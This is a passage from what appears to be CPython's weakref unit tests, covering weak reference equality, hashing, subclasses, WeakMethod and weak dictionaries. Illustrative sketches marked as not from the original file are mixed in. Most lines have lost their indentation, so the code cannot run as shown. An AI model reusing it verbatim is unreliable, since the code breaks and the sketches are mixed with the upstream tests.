self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
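# Illustrative sketch (not from the original file) of two behaviours the
# tests above rely on: refs created without callbacks are shared, and dead
# refs fall back to identity comparison.
def _example_ref_sharing_and_dead_equality():
    o = Object(1)
    r1 = weakref.ref(o)
    r2 = weakref.ref(o)
    assert r1 is r2                  # no-callback refs to one object are reused
    dead = weakref.ref(Object(1))    # the temporary referent dies immediately...
    gc_collect()                     # ...(helped along on PyPy and other GCs)
    assert dead() is None
    assert r1 == weakref.ref(o)      # live refs compare via their referents
    assert not (dead == r1)          # a dead ref only equals itself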
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
gc_collect() # For PyPy or other GCs.
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
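# Illustrative sketch (not from the original file): the practical reason to
# subclass weakref.ref is to attach extra state to the reference itself,
# mirroring MyRef above and the ExtendedRef doctest at the end of this file.
def _example_ref_subclass_with_metadata():
    class TaggedRef(weakref.ref):
        def __init__(self, ob, callback=None, *, tag=None):
            super().__init__(ob, callback)
            self.tag = tag
    o = Object(7)
    r = TaggedRef(o, tag='cache-key-7')
    assert r() is o and r.tag == 'cache-key-7'
    del o
    gc_collect()                                   # for PyPy and other GCs
    assert r() is None and r.tag == 'cache-key-7'  # metadata outlives the referent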
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
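# Illustrative sketch (not from the original file): the use case WeakMethod
# exists for -- keeping bound-method callbacks without keeping their owners
# alive.  A plain weakref.ref(obj.some_method) would die immediately, since
# the bound-method object created by the attribute lookup is transient.
def _example_weakmethod_registry():
    listeners = []
    def register(bound_method):
        listeners.append(weakref.WeakMethod(bound_method))
    def fire():
        results = []
        for wm in listeners:
            method = wm()            # None once the owning object is gone
            if method is not None:
                results.append(method())
        return results
    obj = Object(1)
    register(obj.some_method)        # Object.some_method returns 4 (see above)
    assert fire() == [4]
    del obj
    gc_collect()                     # for PyPy and other GCs
    assert fire() == []              # dead WeakMethods are skipped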
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
        try:
            next(it)
        except StopIteration:
            pass
        del items
        gc.collect()
        n1 = len(dct)
        del it
        gc.collect()
        n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
@support.impl_detail(pypy=False)
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
gc_collect() # For PyPy or other GCs.
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_valued_union_operators(self):
a = C()
b = C()
c = C()
wvd1 = weakref.WeakValueDictionary({1: a})
wvd2 = weakref.WeakValueDictionary({1: b, 2: a})
wvd3 = wvd1.copy()
d1 = {1: c, 3: b}
pairs = [(5, c), (6, b)]
tmp1 = wvd1 | wvd2 # Between two WeakValueDictionaries
self.assertEqual(dict(tmp1), dict(wvd1) | dict(wvd2))
self.assertIs(type(tmp1), weakref.WeakValueDictionary)
wvd1 |= wvd2
self.assertEqual(wvd1, tmp1)
tmp2 = wvd2 | d1 # Between WeakValueDictionary and mapping
self.assertEqual(dict(tmp2), dict(wvd2) | d1)
self.assertIs(type(tmp2), weakref.WeakValueDictionary)
wvd2 |= d1
self.assertEqual(wvd2, tmp2)
tmp3 = wvd3.copy() # Between WeakValueDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wvd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakValueDictionary)
tmp4 = d1 | wvd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wvd3))
self.assertIs(type(tmp4), weakref.WeakValueDictionary)
del a
gc_collect() # For PyPy or other GCs.
self.assertNotIn(2, tmp1)
self.assertNotIn(2, tmp2)
self.assertNotIn(1, tmp3)
self.assertNotIn(1, tmp4)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_keyed_union_operators(self):
o1 = C()
o2 = C()
o3 = C()
wkd1 = weakref.WeakKeyDictionary({o1: 1, o2: 2})
wkd2 = weakref.WeakKeyDictionary({o3: 3, o1: 4})
wkd3 = wkd1.copy()
d1 = {o2: '5', o3: '6'}
pairs = [(o2, 7), (o3, 8)]
tmp1 = wkd1 | wkd2 # Between two WeakKeyDictionaries
self.assertEqual(dict(tmp1), dict(wkd1) | dict(wkd2))
self.assertIs(type(tmp1), weakref.WeakKeyDictionary)
wkd1 |= wkd2
self.assertEqual(wkd1, tmp1)
tmp2 = wkd2 | d1 # Between WeakKeyDictionary and mapping
self.assertEqual(dict(tmp2), dict(wkd2) | d1)
self.assertIs(type(tmp2), weakref.WeakKeyDictionary)
wkd2 |= d1
self.assertEqual(wkd2, tmp2)
tmp3 = wkd3.copy() # Between WeakKeyDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wkd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakKeyDictionary)
tmp4 = d1 | wkd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wkd3))
self.assertIs(type(tmp4), weakref.WeakKeyDictionary)
del o1
gc_collect() # For PyPy or other GCs.
self.assertNotIn(4, tmp1.values())
self.assertNotIn(4, tmp2.values())
self.assertNotIn(1, tmp3.values())
self.assertNotIn(1, tmp4.values())
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
